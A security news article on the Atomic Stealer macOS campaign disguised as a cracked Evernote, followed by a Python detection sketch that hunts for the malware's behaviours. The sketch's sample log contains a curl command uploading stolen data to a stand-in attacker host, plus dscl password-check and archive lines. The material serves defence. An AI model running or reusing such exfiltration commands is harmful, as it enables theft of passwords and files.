
A new cyberattack is targeting macOS users, with the Atomic Stealer malware being distributed under the guise of a cracked version of the popular Evernote application. AhnLab Security Intelligence Center (ASEC) has uncovered this malicious campaign, highlighting the deceptive tactics employed by threat actors to compromise user systems.
Atomic Stealer is a potent information-stealing malware specifically designed to infiltrate macOS environments. Once installed, it can extract a wide range of sensitive data, including browser information, system keychain data, cryptocurrency wallet information, and general system information.
One of the more insidious features of this campaign is its adaptive delivery strategy. When a user lands on the malicious website, the site checks the browser's UserAgent string to determine the visitor's operating system.
“If the UserAgent is for macOS, the user is redirected to the Atomic Stealer installation page. If the UserAgent is for Windows, the user is redirected to the LummaC2 malware installation page,” ASEC noted.
This dynamic approach allows threat actors to target both macOS and Windows environments from a single infrastructure.
To install Atomic Stealer, the site instructs users to run a terminal command themselves, a step that sidesteps Apple's GateKeeper security mechanism.
“This method is likely used to bypass the GateKeeper pop-up that appears when an externally downloaded file is executed,” the report warned.
Once executed, the malware also performs virtual machine detection—looking for strings like “QEMU” and “VMware”—to avoid running in a sandbox or analysis environment.
“Atomic Stealer collects system information using the ‘system_profiler’ and ‘SPMemoryDataType’ commands… then checks for the ‘QEMU’ or ‘VMware’ string in the metadata.”
The malware displays a fake warning window disguised as a legitimate prompt.
“When the user enters the password, it uses the ‘dscl . authonly’ command to validate and store the entered password.”

This password, alongside a trove of other data, is collected using AppleScript and stored in the /tmp directory. The contents—ranging from keychains and browser data to cryptocurrency wallets—are compressed into an archive (out.zip) and exfiltrated to the attacker’s server using curl, before the malware cleans up after itself.
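The execution chain described above (VM check via system_profiler, password validation with `dscl . authonly`, staging in /tmp/out.zip, upload with curl) gives a defender a sequence of host-level behaviours to hunt for. The following detection sketch is an added example, not code from the ASEC report or the malware: it scores process-execution events per user against those behaviours. The log format, the sample events, the weights and the alert threshold are all my own assumptions.

```python
import re
from collections import defaultdict

# Behaviours the article attributes to Atomic Stealer, as regexes over a
# process command line, each with a weight. Weights and threshold are assumptions.
BEHAVIOURS = {
    # VM detection: system_profiler metadata checked for "QEMU"/"VMware"
    "vm_probe": (re.compile(r"\bsystem_profiler\b.*\bSPMemoryDataType\b"), 1),
    # Phished password validated with `dscl . authonly <user> <password>`
    "password_check": (re.compile(r"\bdscl\s+\.\s+authonly\b"), 2),
    # Collected data archived as /tmp/out.zip
    "staging": (re.compile(r"\b(zip|ditto)\b.*/tmp/out\.zip"), 1),
    # Archive uploaded with curl
    "exfil": (re.compile(r"\bcurl\b.*/tmp/out\.zip"), 3),
}
ALERT_THRESHOLD = 3

# Constructed process-execution log ("pid user command", one event per line).
# Invented for this example; not telemetry from the ASEC report.
SAMPLE_LOG = """\
401 alice /usr/bin/system_profiler SPMemoryDataType
402 alice /usr/bin/dscl . authonly alice ********
403 alice /usr/bin/zip -r /tmp/out.zip /tmp/collected
404 alice /usr/bin/curl -F file=@/tmp/out.zip http://c2.example.invalid/upload
501 bob /usr/bin/system_profiler SPHardwareDataType
502 bob /usr/bin/curl -sS https://example.com/release-notes.txt
"""

def parse_events(text):
    """Parse 'pid user command...' lines into (pid, user, cmdline) tuples."""
    events = []
    for line in text.splitlines():
        if line.strip():
            pid, user, cmd = line.split(maxsplit=2)
            events.append((int(pid), user, cmd))
    return events

def tag_event(cmdline):
    """Names of the behaviours whose pattern matches this command line."""
    return {tag for tag, (rx, _) in BEHAVIOURS.items() if rx.search(cmdline)}

def detect(events):
    """Per user, the behaviours observed, kept only for users whose summed
    behaviour weight reaches ALERT_THRESHOLD (one strong or several weak)."""
    seen = defaultdict(set)
    for _pid, user, cmdline in events:
        seen[user] |= tag_event(cmdline)
    return {u: tags for u, tags in seen.items()
            if sum(BEHAVIOURS[t][1] for t in tags) >= ALERT_THRESHOLD}
```

A production rule would additionally scope the correlation to a time window and parent process (the chain runs from one user-launched terminal session), since `system_profiler` and `curl` alone are routine on an administrator's machine.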
According to AhnLab, the malware is often spread through sites promoted by Google Ads, pushing fake Evernote cracks and other popular software bait.